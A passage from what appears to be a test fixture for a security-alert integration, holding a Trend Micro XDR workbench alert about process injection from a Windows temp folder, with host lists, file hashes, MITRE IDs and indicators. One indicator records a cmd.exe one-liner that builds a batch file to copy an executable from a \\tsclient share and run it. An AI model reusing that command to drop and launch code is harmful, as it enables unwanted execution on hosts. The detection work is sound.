\"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": \"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": [\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": \"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}"
+  },
+  "expected": {
+    "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": \"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": [\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": \"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 